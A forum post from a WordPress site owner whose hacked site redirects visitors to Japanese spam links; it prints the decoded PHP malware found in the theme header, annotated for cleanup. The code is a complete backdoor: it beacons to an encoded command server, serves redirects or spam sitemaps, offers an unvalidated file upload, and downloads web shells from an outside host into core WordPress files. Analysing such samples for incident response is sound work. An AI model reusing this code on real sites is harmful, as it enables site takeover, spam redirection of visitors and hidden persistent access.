Malware Attack On WordPress site .xyz
-
Today my website got hacked and is redirecting visitors to other Japanese links. I want to clean the malicious code from WordPress, but each folder is protected with .htaccess.
database and files and cron job
— i found this in theme header and it was based46
// NOTE(review): the listing below is the decoded payload the poster found in the theme header,
// annotated for incident response. It was pasted as a few very long lines; only line breaks and
// comments were added, no code was changed. Every path and URL named in these comments is taken
// from the sample itself and is an indicator to check during cleanup.
set_time_limit(0);               // no script time limit
@ini_set("html_errors","0");     // keep errors out of the page output
@ob_start();

// Two attacker entry points, selected by the `ac` query parameter of the request.
$action = isset($_GET['ac']) ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    // ac=write: write() below downloads further payloads and implants them under wp-includes/.
    $index_name = basename($_SERVER['SCRIPT_NAME']);
    write($index_name);
    echo "write done!";
    exit();
}
if ($action != "" && $action == "mup") {
    // ac=mup: fup() below accepts an unvalidated file upload.
    fup($action);
    exit();
}

// Command-and-control URL, stored as decimal chr() codes separated by '\x' and decoded by o0().
// Decoding the sequence on this page gives http://seo822-12.beautifulsunset.site/api/server.php
$u6='104\x116\x116\x112\x58\x47\x47\x115\x101\x111\x56\x50\x50\x45\x49\x50\x46\x98\x101\x97\x117\x116\x105\x102\x117\x108\x115\x117\x110\x115\x101\x116\x46\x115\x105\x116\x101\x47\x97\x112\x105\x47\x115\x101\x114\x118\x101\x114\x46\x112\x104\x112\x';
$group='ZQ822-12';   // campaign / group id reported to the server
$wjt=0;
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/.htaccess')){ $wjt=1; }   // reports whether a root .htaccess exists

// Strip spaces from every $_SERVER value and drop a few keys before the request is reported.
$_SERVER=@str_replace(' ','',($_SERVER));
unset($_SERVER['PATH']);
unset($_SERVER['SYSTEMROOT']);
unset($_SERVER['COMSPEC']);
unset($_SERVER['PATHEXT']);
unset($_SERVER['WINDIR']);
unset($_SERVER['SERVER_SOFTWARE']);

// Per-request fingerprint sent to the server (host, client IP, URI, a custom client token header,
// user agent, referer, language, script name, port, protocol and TLS hints), so the server can
// choose a different response per visitor.
$s['HTTP_HOST']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'';
$s['REMOTE_ADDR']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'';
//$s['SERVER_ADDR']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'';
$s['REQUEST_URI']=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'';
$s['HTTP_CLIENT_TOKEN']=isset($_SERVER['HTTP_CLIENT_TOKEN'])?$_SERVER['HTTP_CLIENT_TOKEN']:'';
$s['HTTP_USER_AGENT']=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$s['HTTP_REFERER']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';
$s['HTTP_ACCEPT_LANGUAGE']=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';
$s['SCRIPT_NAME']=isset($_SERVER['SCRIPT_NAME'])?$_SERVER['SCRIPT_NAME']:'';
$s['SERVER_PORT']=isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:'';
$s['SERVER_PROTOCOL']=isset($_SERVER['SERVER_PROTOCOL'])?$_SERVER['SERVER_PROTOCOL']:'';
$s['HTTP_X_FORWARDED_PROTO']=isset($_SERVER['HTTP_X_FORWARDED_PROTO'])?$_SERVER['HTTP_X_FORWARDED_PROTO']:'';
$s['HTTPS']=isset($_SERVER['HTTPS'])?$_SERVER['HTTPS']:'';
$s['HTTP_X_FORWARDED_SSL']=isset($_SERVER['HTTP_X_FORWARDED_SSL'])?$_SERVER['HTTP_X_FORWARDED_SSL']:'';
if (phpversion() < '5.2' || PHP_VERSION_ID < 50200) { $sj=serialize($s); }else{ $sj=json_encode($s); }

// Beacon: fetch the server's response for this request, passing the fingerprint, group id,
// time and a fixed token. Whatever comes back is served to the visitor below.
$info=cgg(o0($u6).'?group='.$group.'&server='.$sj.'&wjt='.$wjt.'&time='.time().'&token=zqO0o1IliLp2&phpv='.phpversion());

// Delete the site's real robots.txt and sitemap.xml so the server-supplied ones are served instead.
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/robots.txt')){ @unlink($_SERVER['DOCUMENT_ROOT'].'/robots.txt'); }
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml')){ @unlink($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml'); }

if($info){
    // The response body is echoed verbatim; only the content type depends on the request URI.
    if(stripos($_SERVER['REQUEST_URI'],'sitemap.xml')!==false && stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')===false){
        header('Content-type:application/xml');
        echo ($info);
        exit();
    }elseif ($_SERVER['REQUEST_URI']=='/robots.txt'){
        header('Content-Type: text/plain;charset=utf-8');
        echo ($info);
        exit();
    }elseif(stripos($_SERVER['REQUEST_URI'],'atom.xml')!==false || stripos($_SERVER['REQUEST_URI'],'index.rdf')!==false || stripos($_SERVER['REQUEST_URI'],'rss.xml')!==false || stripos($_SERVER['REQUEST_URI'],'sitemap.xsl')!==false){
        header('Content-type:application/xml');
        echo ($info);
        exit();
    }else if (preg_match('/sitemap(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)-(\d+).xml$/i',$_SERVER['REQUEST_URI'],$map_uri)){
        // Numbered sitemap URLs: served as XML, or answered 404 when the server says so.
        if($map_uri[1]!="" && $map_uri[2]!="") {
            if($info=='HTTP/1.1 404 Not Found'){
                header($info);
                header("Status: 404 Not Found");
                exit();
            }else {
                header('Content-type:application/xml');
                echo($info);
                exit();
            }
        }
    }elseif(stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')!==false ){
        // pingsitemap.xml: the response is unserialize()d into a list of URLs, each of which is
        // fetched from this server and its result printed. unserialize() on remote data is itself
        // a code-execution risk, independent of the rest of the script.
        //$google=json_decode($info,true);
        $google=unserialize($info);
        foreach ($google as $g){
            $r = cgg($g);
            // NOTE(review): stripos($r, '') uses an empty needle; on PHP 8 that returns 0, so the
            // condition is always true there — confirm against the PHP version in use.
            if ($r == 'success' || (stripos($r, 'successfully') !== false) || (stripos($r, '') !== false) || (stripos($r, '') !== false) || (stripos($r,'webmasters')!==false)) {
                echo '<p style="color:#00A000">' . $g . '--------' . $r . '</p>';
            } else {
                echo '<p style="color:#ff0000"><a href="' . $g . '" target="_blank">' . $g . '</a>--------' . $r . '</p>';
            }
        }
        exit();
    } else{
        // Any other URI: a response starting with 'Location:' is sent as a header, i.e. the visitor
        // is redirected (this matches the redirect the poster observed); a 404 string is ignored;
        // any other body replaces the page output entirely.
        header("Content-type: text/html; charset=utf-8");
        if(substr($info,'0',9)==='Location:'){
            header($info);
            exit();
        }elseif ($info=='HTTP/1.1 404 Not Found'){
        } else{
            if($info){
                print_r($info);
                exit();
            }
        }
    }
}else{
    //echo('500 error');
}

// Fetch a URL: file_get_contents() first, then curl with peer verification disabled and a fixed
// Firefox user agent. Used for the beacon above, the pings, and the payload downloads in write().
function cgg($url) {
    $contents = @file_get_contents($url);
    if(!$contents) {
        $header = array( 'Accept: */*', 'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', );
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        $contents = curl_exec($curl);
        curl_close($curl);
    }
    return $contents;
}

// Decode the '\x'-separated decimal chr() codes used to hide $u6.
function o0($u){
    $a=explode('\x',$u);
    $u1='';
    foreach ($a as $b){
        if($b) { $u1 .= chr($b); }
    }
    return $u1;
}

// ac=mup handler: prints an upload form and moves the uploaded file to the client-supplied file
// name with no validation — an arbitrary file write relative to the script's working directory.
function fup($g){
    error_reporting(0);
    if ($g == 'mup') {
        $saw1 = $_FILES['file']['tmp_name'];
        $saw2 = $_FILES['file']['name'];
        echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
        move_uploaded_file($saw1, $saw2);
        exit(0);
    }
}

// ac=write handler: downloads payloads from abc.firstguide.xyz and implants them. Paths are
// relative to the script's working directory (normally the site root). Files it creates or
// modifies, all of which should be inspected and restored from a clean copy during cleanup:
//   css/.htaccess, css/load.php                                   (new, server-supplied content)
//   wp-admin/images/arrow-lefts.png, wp-admin/images/arrow-rights.png   (copies of the index file and .htaccess)
//   wp-includes/images/smilies/icon_devil.gif, icon_crystal.gif  (the same copies)
//   wp-includes/template-loader.php                               (payload prepended)
//   wp-includes/load.php                                          (payload appended)
//   wp-includes/SimplePie/index.php                               (overwritten with a downloaded payload)
function write($index_name) {
    $write1 = cgg("https://abc.firstguide.xyz/write1.txt");
    $write2 = cgg("https://abc.firstguide.xyz/write2.txt");
    $shell_postfs = cgg("https://abc.firstguide.xyz/mm1.txt");
    $shell_load = cgg("https://abc.firstguide.xyz/mm2.txt");
    $new_ht_content = cgg("https://abc.firstguide.xyz/shl/htaccess.txt");
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents($index_name);
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/index.php";
    if (!is_dir("css")) { mkdir("css", 0755, true); }
    // The downloaded payloads reference ./index.php in base64; rewrite that when the script
    // itself lives under a different file name.
    if ($index_name != "index.php") {
        $write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
        $write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
    }
    @chmod("css/.htaccess", 0755);
    file_put_contents("css/.htaccess", $new_ht_content);
    file_put_contents("css/load.php", $shell_load);
    if (is_dir("wp-includes/SimplePie")) {
        // Copies of the original index file and .htaccess are stashed under image-like names.
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
        file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
        file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
        file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
        $loader_content = file_get_contents($loader_php);
        $load_content = file_get_contents($load_php);
        @chmod($loader_php, 0755);
        @chmod($load_php, 0755);
        // Core files are kept functional: payload prepended to template-loader.php and appended
        // to load.php, then permissions set back so the edit is less conspicuous.
        file_put_contents($loader_php, $write1 . $loader_content);
        file_put_contents($load_php, $load_content . $write2);
        @chmod($loader_php, 0644);
        @chmod($load_php, 0644);
        file_put_contents($font_editor_php, $shell_postfs);
    }
}
?>
Every plugin was updated and the theme also; I don't know how they got access to my site.